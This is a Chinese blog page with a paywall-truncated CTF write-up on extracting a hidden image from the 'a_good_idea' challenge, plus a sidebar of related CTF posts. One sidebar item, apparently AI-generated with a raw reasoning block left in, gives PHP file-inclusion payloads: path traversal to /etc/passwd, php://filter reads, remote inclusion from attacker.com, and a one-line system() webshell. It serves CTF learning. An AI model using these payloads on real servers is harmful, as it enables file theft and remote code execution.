[XCTF]a_good_idea(难度1)

最新推荐文章于 2026-01-06 15:18:54 发布
原创 最新推荐文章于 2026-01-06 15:18:54 发布 · 804 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

本文记录了一位博主从零开始,通过010Editor、binwalk、stegsolve等工具,逐步揭示隐藏在图片中的LSB隐写旗的过程,展示了自我学习和实践探索的解题思路。

乌拉!第一个完全自己快速摸索出来的题目!

前言

在前期刷了众多题目之后,对于图片的掌握也到了一定的水平

没有任何提示,就按部就班地从010editor(或者winhex)、binwalk查看有误隐写、foremost分解、stegsolve查看LSB隐写等一步步来,最终还是找到了flag~

一、010editor查看

 emmm似乎有什么hint.txt/to_do.png/PK等敏感字符,似乎隐写在图片中的概率很大啊~,用binwalk查看一下吧~

二、binwalk查看是否有文件隐写在图片

binwalk -e 文件名

 

而且没用foremost已经解压出来一个文件夹

 

 解压包解压出来的也还是旁边那个misc文件夹

<
最低0.47元/天 解锁文章
xctf攻防世界 MISC高手进阶区 a_good_idea
l8947943的博客
01-12 1485
1. 进入环境、下载附件 给的是一个rar压缩包,我们将其下载后,发现是一张Tomcat的可爱照片,如图: 猜测可能是隐写,开始动手! 2. 问题分析 尝试StegSolve 一通操作后并没有发现什么有用的信息,题目提示a_good_idea(大胆想法),猜测有没有文件包含,我们使用winhex打开图片,如图: 2. 挖掘信息 尝试在文件中搜索flag,没有找到任何信息,我们观察文件的头ASCII和文件尾部的ASCII。在头部没有什么有用的信息,拉倒最后,我们发现了问题所在,如图: 发现misc文件下
[XCTF]Become_a_Rockstar(难度2)
Mr_Fmnwon的博客
12-19 792
文件 .rock 后缀意味着什么?仅仅在玩笑摇滚?题目里的rockstar竟是一种语言!
XCTF练习题---MISC---a_good_idea
liu914589417的博客
12-16 599
XCTF练习题—MISC—a_good_idea flag:NCTF{m1sc_1s_very_funny!!!} 解题步骤: 1、观察题目,下载附件 2、到手以后发现是一张图片,尝试修改文件扩展名为.zip压缩包格式,得到两张图片 3、两张图片没啥区别,脑海中直接闪过大杀器Stegsolve,尝试图片合成,得到这样的一张图片 4、到这步实在不知道咋办了,上网查了一下,说是二维码,调整曝光度就可以了,在这里推荐个在线PS网站,经过不懈努力,调整了5次曝光度得到了二维码,如下图 网站地址:https:/
XCTF MISC 高手区 a_good_idea
duwanglai的博客
01-06 246
a_good_idea 附件下载下来是一张图片,老规矩直接上foremost,分解得到一个压缩包,里面包含两张图片和一个txt txt文件就是一句提示语,没有什么特别 hint.txt try to find the secret of pixels 既然给了两张图片,应该是要对图片进行对比或者合成、拼接、异或等操作。用stegsolve打开其中一张图片,再Analyse—image combiner导入另一张 对两张图片进行异或操作发现异常,保存下来,PhotoDemon调节曝光度得到二维
XCTFMISC A Good Idea WP
Mr_jingjing的博客
05-15 605
刚开始做只得到了第一步然后不知道了,网上搜到两种做法,亲自实现后总结一下。 一. 1.下载压缩包解压后,改图片后缀名为zip打开发现有两张图片一个txt(solve.png是我合成之后save的图片) 2.Stegsolve合成两张图片,发现有红色的亮点,仔细看好像二维码 3.Stegsolve打开图片切换通道得到二维码 扫描得到flag。 二.采用PIL脚本比较两张图片像素差异然后重新将其输出为新的图片。 放脚本: 在这里from PIL import Image im1 = Image.open(
XCTF-Misc1 a_good_idea Ditf
orchid_sea的博客
01-03 592
附件是一张图片。
xctf windows_reverse1
weixin_45701079的博客
10-24 475
xctf windows_reverse1 日常水一波 这道题是有加壳的(upx),用010分析就知道了 脱壳之后找到动态调试不行,经大佬讲解,发现win7之后加入了ALSR,然后这个文件不支持ALSR,所以动态调试不行,只能用ida打开 乍一看,v4和v6没有任何关系,但是查看汇编 把v4的地址放入了ecx,然后看调用的函数 v1的保存值就是ecx,所以思路就出来了。v1的值就是main函数的v4的值 然后通过地址相减(仔细看上图会发现是个负数),然后地址的差值作为另一个的索引,这里用了溢出,然后找到
XCTF_A_应收管理标准功能培训.pptx
10-11
XCTF_A_应收管理标准功能培训】的PPT内容涵盖了Oracle财务系统的应收管理模块,这个模块是企业销售到收款流程中的关键部分。以下是基于提供的文件内容详细解析的知识点: 1. **销售到收款流程概览**: - 销售到...
攻防世界misc进阶区a_good_idea
gongjingege的博客
08-17 3524
下载附件 重命名,zip解压(比rar解压出来的文件多,搞不懂这两个为啥) 先打开to_do(打开顺序反了的话,得不到二维码) 再与to拼接图片 转换色道 扫描二维码 得到flag:NCTF{m1sc_1s_very_funny!!!} 感觉做misc题得灵性,一道题好多解法,但你可能一种都找不到,尤其是大佬们的思路天马行空 好比这道题,binwalk打开就直接有hint.txt了,还可以ps调高曝光度,得到二维码,还有Beyond Compare 感觉评论区个个都是人才,说话又好听,懂得又多 20
攻防世界a_good_idea
xixihahawuwu的博客
09-08 1748
文件下载下来,解压后里面有几个文件夹 里面有一张图片 拉到winhex中开一下 我们可以看到蓝色部分的区域 在这张图片里有几种不同的文件 当然pk一出来就知道是什么了 (pk==内含压缩包) 把后缀改为zip进行解压 果然,修改后缀后在解压文件, 打开文本文件 试着去找到像素的秘密 这句话一出来就有那味了~ 总共就两张图片,一个个查看属性,发现并不是我认为的普通的宽高不一样 但是看文件大小还是确定这两个照片有问题 这个时候想到也许要把两个文件合到一起 合并的方法这里不说了,应该大家都会,也可.
攻防世界 A GOOD idea WP
qq_43455259的博客
04-06 2029
攻防世界 A GOOD idea WP 1.下载压缩包解压后,改图片后缀名为zip打开发现有两张图片一个txt 2.Stegsolve合成两张图片,发现有红色的亮点,仔细看好像二维码 3.Ps调整图片参数,最终发现需要调大曝光度,得到二维码 4.扫描二维码得到flag NCTF{m1sc_1s_very_funny!!!} ...
攻防世界a_good_idea解题思路超详细
qq_53105813的博客
06-27 967
攻防世界方法讲解
攻防世界 a_good_idea
YUK_103的博客
02-03 5303
给了个这个 基操一下: PK == 内含压缩包 用kali分离后: 有三个文件,python文件是我写的。 这个hint告诉我们: try to find the secret of pixels 像素的秘密?一开始以为是宽高不一样,看了属性后发现都是一样的,回溯。 细细思考:to,to_do。显然是todo.png中有些东西,而且和像素有关 于是乎: from PIL import Im...
XCTF 3rd-GCTF-2017 hackme
qq_41071646的博客
05-07 1806
这个题 有字符串 感觉简单了许多 然后这个题 算法就在这 我们写出来脚本就行 #include <stdio.h> #include<iostream> #include<iomanip> #include<stdio.h> #include<string.h> #include<algorithm> #incl...
XCTF 攻防世界 MISC杂项 高手进阶区
qq_44657899的博客
02-05 5544
文章目录MISCall神奇的Modbus(送分)embarrass(送分)Training-Stegano-1(送分)Test-flag-please-ignore(16进制转字符)stage1(图片隐写,反编译)Hear-with-your-Eyes(音频隐写-频谱图) MISCall 神奇的Modbus(送分) 日期:2020/02/04 题目说了Modbus,百度了一下是一个通讯协议。 先...
xctf web题
05-09 3362
view_source 难度系数: 题目来源: Cyberpeace-n3k0 X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了 可以通过view-source:的方法来访问源码: view-source:加上url 在url中提交后便可访问页面源码,在源码中可找到flag。 这个题目很简单,但是如果使用的浏览器是ie edge等,用例如 view-source:htt...
XCTF攻防世界_Misc进阶区001
FAFU小宋的博客
10-30 651
XCTF_Misc_高手进阶区base64÷4reverseMesomething_in_imagewireshark-1pure_colorAesop_secreta_good_ideaTraining-Stegano-1can_has_stdio? base64÷4 (1)根据题目提示,直接用base16解密得到flag reverseMe (1)打开附件,发现是一张图片 (2)用画图工具打开该图片,使用水平翻转,即可查看到flag something_in_image 解法一: (1)使用
HTTPS真的安全吗?—— 使用 mitmproxy 中间人攻击破解 GitHub 登录会话
Bruce_xiaowei的博客
01-02 396
本文演示了使用mitmproxy对HTTPS加密通信进行中间人攻击的实验过程。通过搭建Mac主机与Win11虚拟机的网络环境,配置mitmproxy监听9090端口并安装CA证书,成功捕获GitHub登录过程中的明文密码。实验详细说明了代理设置、证书安装和流量捕获步骤,验证了在未正确验证证书的情况下,HTTPS传输的敏感信息仍可能被窃取。结果表明,仅依赖HTTPS不能完全保证通信安全,必须配合严格的证书验证机制。文章还提供了常见问题排查方法和实验命令参考。
如何管理API安全风险以增强防御能力
最新发布
HoewDec的博客
01-06 687
应用程序编程接口(API)的使用量急剧增加。现在,组织机构依赖多个API来高效地执行日常功能。API使用量的增长引起了黑客的注意,促使他们设计创新的方法来利用API漏洞。为什么API安全至关重要,以及如何管理API安全风险?让我们来了解。
xctf web_php_include
03-29
<think>好的,用户需要了解XCTF竞赛中与PHP include相关的Web安全漏洞的解题思路。首先,我应该回忆PHP中的文件包含漏洞,尤其是include函数的不当使用可能导致的安全问题。用户提到的引用[4]中的代码显示,$lan变量直接来自Cookie中的language值,然后拼接.php后缀进行包含。这种情况下,如果没有严格的过滤,攻击者可能通过修改Cookie来包含任意文件,比如利用路径遍历或者远程文件包含。 接下来,我需要考虑常见的利用方法。例如,路径遍历攻击,用户可能构造类似../../etc/passwd的payload来读取系统文件。此外,如果服务器配置允许远程包含(allow_url_include为On),攻击者可以包含恶意服务器上的文件执行代码。引用[3]的PHP类型比较文档可能帮助理解变量处理,但这里更关键的是文件包含漏洞。 然后,解题步骤可能包括:检查代码中是否存在未过滤的用户输入,尝试包含敏感文件如/etc/passwd,或者上传恶意文件并通过包含执行。例如,在引用[4]的情况中,设置Cookie的language为../../../tmp/uploaded_file,如果存在上传临时文件的话。还可能利用PHP伪协议,如php://filter来读取源码,比如?lan=php://filter/convert.base64-encode/resource=config,这样可以获取base64编码后的文件内容。 同时,需要注意引用[2]中提到的情况,通过文件包含读取admin.php或function.php的源码,这可能泄露关键信息。此外,确保回答中引用了正确的来源,比如引用[4]的代码示例,说明如何利用Cookie进行文件包含。 最后,生成相关问题时要覆盖漏洞原理、利用方式、防御措施和CTF中的其他常见漏洞,帮助用户全面理解。需要确保回答结构清晰,步骤详细,并且引用正确,比如在关键点后添加[^4]或[^2]。</think>### XCTF PHP include Web安全漏洞解题思路 在CTF竞赛中,PHP的`include`函数常因未正确过滤用户输入导致文件包含漏洞。以下是基于引用[4]的代码分析及典型解题方法: --- #### **漏洞原理** 1. **关键代码片段** 通过Cookie中的`language`参数动态包含文件: ```php $lan = $_COOKIE['language']; @include($lan.".php"); ``` 若未对`$lan`进行过滤,攻击者可通过路径遍历(如`../../../etc/passwd`)或PHP伪协议(如`php://filter`)读取任意文件[^4]。 2. **漏洞利用条件** - 目标服务器开启`allow_url_include`(远程文件包含) - 文件路径可控且未限制文件后缀 --- #### **解题步骤** 1. **探测漏洞** - 修改Cookie中`language`值为`../../../../etc/passwd%00`,尝试读取系统文件(需PHP版本<5.3.4,因空字节截断漏洞)[^4]。 2. **利用PHP伪协议** - **读取源码**:构造Payload为`php://filter/convert.base64-encode/resource=index`,通过Base64解码获取源码: ```http Cookie: language=php://filter/convert.base64-encode/resource=index ``` - **远程代码执行**:若允许远程包含,设置`language=http://attacker.com/shell.txt`,触发恶意代码执行。 3. **结合文件上传** - 若存在文件上传功能,上传含恶意代码的图片(如`<?php system($_GET['cmd']);?>`),通过包含临时文件路径实现RCE: ```http Cookie: language=../../../tmp/uploaded_file ``` --- #### **防御措施** 1. 白名单限制包含路径(如只允许包含`en/`或`zh/`目录) 2. 使用`basename()`函数过滤路径中的特殊字符 3. 关闭`allow_url_include`配置 ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值